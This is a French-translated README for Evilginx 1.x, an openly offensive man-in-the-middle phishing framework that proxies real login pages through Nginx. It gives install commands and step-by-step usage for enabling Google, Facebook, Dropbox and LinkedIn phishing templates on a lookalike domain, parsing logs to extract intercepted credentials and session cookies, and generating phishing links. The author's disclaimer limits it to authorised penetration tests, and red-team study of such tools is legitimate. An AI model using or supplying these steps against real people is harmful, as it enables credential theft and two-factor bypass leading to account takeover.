
VEUILLEZ UTILISER LA NOUVELLE VERSION: https://github.com/kgretzky/evilginx2

CETTE VERSION EST OBSOLÈTE. VEUILLEZ UTILISER LA DERNIÈRE VERSION !
EVILGINX 2: https://github.com/kgretzky/evilginx2
Evilginx est un framework d'attaque man-in-the-middle utilisé pour le phishing d'identifiants et de cookies de session de n'importe quel service web. Son cœur s'exécute sur le serveur HTTP Nginx, qui utilise proxy_pass et sub_filter pour proxyfier et modifier le contenu HTTP, tout en interceptant le trafic entre le client et le serveur.
Vous pouvez apprendre comment cela fonctionne et comment tout installer vous-même sur mon blog :
Premier article légèrement obsolète maintenant : Evilginx - Phishing avancé avec contournement de l'authentification à deux facteurs
Mise à jour Evilginx 1.0 : Mise à jour Evilginx 1.0 - Passez à la vitesse supérieure en matière de phishing 2FA
Mise à jour Evilginx 1.1 : Mise à jour Evilginx 1.1
Je suis conscient qu'Evilginx peut être utilisé à des fins très néfastes. Ce travail n'est qu'une démonstration de ce que des attaquants compétents peuvent faire. Il est de la responsabilité du défenseur de prendre en compte de telles attaques lors de la mise en place de défenses et de trouver des moyens de se protéger contre cette méthode de phishing. Evilginx ne doit être utilisé que dans le cadre de missions légitimes de tests de pénétration avec l'autorisation écrite des parties devant être phishées.
Evilginx fournit un script d'installation install.sh qui se charge d'installer l'ensemble du package sur n'importe quelle machine Debian wheezy/jessie, de manière 'fire and forget'.
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configurer Evilginx.
parse Analyser les fichiers journaux.
genurl Générer une URL de phishing.
optional arguments:
-h, --help afficher ce message d'aide et quitter
Activer ou désactiver les configurations de site pour une utilisation avec le serveur Nginx, en utilisant les modèles Evilginx fournis depuis le répertoire sites.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help afficher ce message d'aide et quitter
-d DOMAIN, --domain DOMAIN
Votre domaine de phishing.
-y Répondre 'Oui' à toutes les questions.
-l, --list Lister les applications supportées disponibles.
--enable ENABLE Activer le site suivant par nom.
--disable DISABLE Désactiver le site suivant par nom.
Lister les modèles de configuration de site disponibles :
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
Activer le site de phishing Google avec le domaine de phishing préenregistré not-really-google.com :
python evilginx.py setup --enable google -d not-really-google.com
Désactiver le site de phishing Facebook :
python evilginx.py setup --disable facebook
Analyser les journaux Nginx pour extraire les identifiants de connexion et les cookies de session interceptés. Les journaux, par défaut, sont enregistrés dans le répertoire logs, où réside le script evilginx.py.
Cela peut être fait automatiquement après avoir activé l'analyse automatique dans la phase Configuration.
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help afficher ce message d'aide et quitter
-s SITE, --site SITE Nom du site pour lequel analyser les journaux ('all' pour analyser les journaux de tous les sites).
--debug Ne pas tronquer le fichier journal après l'analyse.
Analyser les journaux uniquement pour le site Google :
python evilginx.py parse -s google
Analyser les journaux pour tous les sites disponibles :
python evilginx.py parse -s all
Générer des URL de phishing que vous pouvez utiliser dans vos évaluations Red Team.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help afficher ce message d'aide et quitter
-s SITE, --site SITE Nom du site pour lequel générer le lien.
-r REDIRECT, --redirect REDIRECT
Rediriger l'utilisateur vers cette URL après une connexion réussie.
Générer une URL de phishing Google qui redirigera la victime vers la vidéo rick roll après une connexion réussie :
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ